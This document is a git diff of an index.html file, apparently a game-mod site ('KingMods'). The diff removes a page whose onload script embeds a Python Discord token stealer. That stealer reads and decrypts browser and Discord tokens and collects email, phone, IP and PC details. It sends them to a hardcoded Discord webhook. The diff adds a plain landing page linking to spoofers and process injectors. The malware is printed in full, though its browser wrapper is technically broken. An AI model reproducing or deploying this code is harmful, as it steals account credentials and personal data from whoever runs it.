--- a/index.html
+++ b/index.html
@@ -1,174 +1,82 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Run Python Script</title>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>KingMods</title>
+  
+<style>
+  body {
+    font-family: 'Arial', sans-serif;
+    background-color: #2e2e2e;
+    color: #ffffff;
+    margin: 0;
+    display: flex;
+  }
+  .sidebar {
+    width: 250px;
+    background-color: #1f1f1f;
+    height: 100vh;
+    position: fixed;
+    top: 0;
+    left: 0;
+    padding: 20px;
+    box-shadow: 2px 0 10px rgba(0,0,0,0.3);
+  }
+  .sidebar h1 {
+    font-size: 24px;
+    color: #e63946;
+    margin-bottom: 30px;
+    cursor: pointer;
+  }
+  .sidebar a {
+    display: block;
+    color: #ccc;
+    text-decoration: none;
+    margin: 15px 0;
+    transition: 0.3s;
+  }
+  .sidebar a:hover {
+    color: #fff;
+  }
+  .main-content {
+    margin-left: 270px;
+    padding: 40px;
+    max-width: 900px;
+  }
+  a.discord {
+    display: inline-block;
+    background-color: #e63946;
+    color: white;
+    padding: 10px 18px;
+    border-radius: 5px;
+    text-decoration: none;
+    margin-top: 20px;
+  }
+  img {
+    width: 100%;
+    margin-top: 15px;
+    border-radius: 6px;
+  }
+</style>
+
 </head>
 <body>
-    <h1>Running Python Script...</h1>
-    <script>
-        // Function to run a Python script
-        function runPythonScript() {
-            // Create a new script element
-            var script = document.createElement('script');
-            script.type = 'text/javascript';
-            script.src = 'data:text/javascript,' + encodeURIComponent(`
-                var process = require('process');
-                process.chdir(__dirname);
-                var { exec } = require('child_process');
-                exec('python3 -c "' + encodeURIComponent(`
-from base64 import b64decode
-from Crypto.Cipher import AES
-from win32crypt import CryptUnprotectData
-from os import getlogin, listdir
-from json import loads
-from re import findall
-from urllib.request import Request, urlopen
-from subprocess import Popen, PIPE
-import requests, json, os
-from datetime import datetime
+  <div class="sidebar">
+    <h1 onclick="location.href='../index.html'">KingMods</h1><a href="projects/username-spoofer.html">Username Spoofer</a>
+<a href="projects/process-injector.html">Process Injector</a>
+<a href="projects/rocket-league-mod.html">Rocket League Mod</a>
+<a href="projects/title-spawner.html">Title Spawner</a>
+<a href="projects/pc-tools.html">PC Tools</a>
+<a href="projects/rl-dump-tools.html">RL Dump Tools</a>
 
-tokens = []
-cleaned = []
-checker = []
-
-def decrypt(buff, master_key):
-    try:
-        return AES.new(CryptUnprotectData(master_key, None, None, None, 0)[1], AES.MODE_GCM, buff[3:15]).decrypt(buff[15:])[:-16].decode()
-    except:
-        return "Error"
-def getip():
-    ip = "None"
-    try:
-        ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
-    except: pass
-    return ip
-def gethwid():
-    p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
-    return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
-def get_token():
-    already_check = []
-    checker = []
-    local = os.getenv('LOCALAPPDATA')
-    roaming = os.getenv('APPDATA')
-    chrome = local + "\\\\Google\\\\Chrome\\\\User Data"
-    paths = {
-        'Discord': roaming + '\\\\discord',
-        'Discord Canary': roaming + '\\\\discordcanary',
-        'Lightcord': roaming + '\\\\Lightcord',
-        'Discord PTB': roaming + '\\\\discordptb',
-        'Opera': roaming + '\\\\Opera Software\\\\Opera Stable',
-        'Opera GX': roaming + '\\\\Opera Software\\\\Opera GX Stable',
-        'Amigo': local + '\\\\Amigo\\\\User Data',
-        'Torch': local + '\\\\Torch\\\\User Data',
-        'Kometa': local + '\\\\Kometa\\\\User Data',
-        'Orbitum': local + '\\\\Orbitum\\\\User Data',
-        'CentBrowser': local + '\\\\CentBrowser\\\\User Data',
-        '7Star': local + '\\\\7Star\\\\7Star\\\\User Data',
-        'Sputnik': local + '\\\\Sputnik\\\\Sputnik\\\\User Data',
-        'Vivaldi': local + '\\\\Vivaldi\\\\User Data\\\\Default',
-        'Chrome SxS': local + '\\\\Google\\\\Chrome SxS\\\\User Data',
-        'Chrome': chrome + 'Default',
-        'Epic Privacy Browser': local + '\\\\Epic Privacy Browser\\\\User Data',
-        'Microsoft Edge': local + '\\\\Microsoft\\\\Edge\\\\User Data\\\\Defaul',
-        'Uran': local + '\\\\uCozMedia\\\\Uran\\\\User Data\\\\Default',
-        'Yandex': local + '\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\Default',
-        'Brave': local + '\\\\BraveSoftware\\\\Brave-Browser\\\\User Data\\\\Default',
-        'Iridium': local + '\\\\Iridium\\\\User Data\\\\Default'
-    }
-    for platform, path in paths.items():
-        if not os.path.exists(path): continue
-        try:
-            with open(path + f"\\\\Local State", "r") as file:
-                key = loads(file.read())['os_crypt']['encrypted_key']
-                file.close()
-        except: continue
-        for file in listdir(path + f"\\\\Local Storage\\\\leveldb\\\\"):
-            if not file.endswith(".ldb") and file.endswith(".log"): continue
-            else:
-                try:
-                    with open(path + f"\\\\Local Storage\\\\leveldb\\\\{file}", "r", errors='ignore') as files:
-                        for x in files.readlines():
-                            x.strip()
-                            for values in findall(r"dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\"]*", x):
-                                tokens.append(values)
-                except PermissionError: continue
-        for i in tokens:
-            if i.endswith("\\\\"):
-                i.replace("\\\\", "")
-            elif i not in cleaned:
-                cleaned.append(i)
-        for token in cleaned:
-            try:
-                tok = decrypt(b64decode(token.split('dQw4w9WgXcQ:')[1]), b64decode(key)[5:])
-            except IndexError == "Error": continue
-            checker.append(tok)
-            for value in checker:
-                if value not in already_check:
-                    already_check.append(value)
-                    headers = {'Authorization': tok, 'Content-Type': 'application/json'}
-                    try:
-                        res = requests.get('https://discordapp.com/api/v6/users/@me', headers=headers)
-                    except: continue
-                    if res.status_code == 200:
-                        res_json = res.json()
-                        ip = getip()
-                        pc_username = os.getenv("UserName")
-                        pc_name = os.getenv("COMPUTERNAME")
-                        user_name = f'{res_json["username"]}#{res_json["discriminator"]}'
-                        user_id = res_json['id']
-                        email = res_json['email']
-                        phone = res_json['phone']
-                        mfa_enabled = res_json['mfa_enabled']
-                        has_nitro = False
-                        res = requests.get('https://discordapp.com/api/v6/users/@me/billing/subscriptions', headers=headers)
-                        nitro_data = res.json()
-                        has_nitro = bool(len(nitro_data) > 0)
-                        days_left = 0
-                        if has_nitro:
-                            d1 = datetime.strptime(nitro_data[0]["current_period_end"].split('.')[0], "%Y-%m-%dT%H:%M:%S")
-                            d2 = datetime.strptime(nitro_data[0]["current_period_start"].split('.')[0], "%Y-%m-%dT%H:%M:%S")
-                            days_left = abs((d2 - d1).days)
-                        embed = f"""**{user_name}** *({user_id})*
-
-> :dividers: __Account Information__
-	Email: `{email}`
-	Phone: `{phone}`
-	2FA/MFA Enabled: `{mfa_enabled}`
-	Nitro: `{has_nitro}`
-	Expires in: `{days_left if days_left else "None"} day(s)`
-
-> :computer: __PC Information__
-	IP: `{ip}`
-	Username: `{pc_username}`
-	PC Name: `{pc_name}`
-	Platform: `{platform}`
-
-> :piñata: __Token__
-	`{tok}`
-
-*Made by Zemi* **|** ||.gg/exploits||"""
-                        payload = json.dumps({'content': embed, 'username': '.gg/exploits', 'avatar_url': 'https://cdn.discordapp.com/attachments/826581697436581919/982374264604864572/atio.jpg'})
-                        try:
-                            headers2 = {
-                                'Content-Type': 'application/json',
-                                'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'
-                            }
-                            req = Request('https://discordapp.com/api/webhooks/1396586836499107971/iiJJzGUi3-aKywf7KRASGbw_zs-U5fU--vhkJGItjVrWw55Qsw3JAoK3SRCUeM9CAw4u', data=payload.encode(), headers=headers2)
-                            urlopen(req)
-                        except: continue
-                else: continue
-if __name__ == '__main__':
-    get_token()
-                `), headers: { 'Content-Type': 'application/json' } });
-                document.body.appendChild(script);
-            `);
-            document.body.appendChild(script);
-        }
-
-        // Run the script when the page loads
-        window.onload = runPythonScript;
-    </script>
+  </div>
+  <div class="main-content">
+    <h2>Welcome to KingMods</h2>
+    <p><strong>About Us:</strong> KingMods is a developer collective focused on powerful mods and tools for Rocket League and Windows. Our goal is to empower players and developers with cutting-edge utilities for customization, modding, and optimization.</p>
+    <p><strong>What We Offer:</strong> From spoofers and injectors to full-featured RL frameworks and debugging tools, our suite of open-source projects helps you take control of your game or system.</p>
+    <p><strong>Community:</strong> Join our Discord to get help, contribute, or request features.</p>
+    <a class="discord" href="https://discord.gg/kingmods" target="_blank">Join Discord</a>
+  </div>
 </body>
 </html>
